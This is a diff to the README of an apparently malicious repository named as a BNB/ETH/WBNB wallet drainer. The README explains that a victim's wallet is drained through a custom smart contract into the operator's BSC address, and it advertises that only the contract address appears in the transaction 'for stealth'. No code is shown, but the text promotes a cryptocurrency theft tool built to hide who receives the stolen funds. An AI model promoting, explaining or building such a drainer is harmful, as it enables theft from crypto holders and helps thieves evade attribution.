rayrock73/bnb-eth-wbnb-wallet-drainer/README.md

 HOW IT WORKS

-VICTIM ----> CUSTOM SMART CONTRACT -----> YOUR BSC ADDRESS
+Wallet gets drained ----> CUSTOM SMART CONTRACT -----> YOUR BSC ADDRESS

 The !!! smart contract address !!! appears in the transaction not yours this is for stealth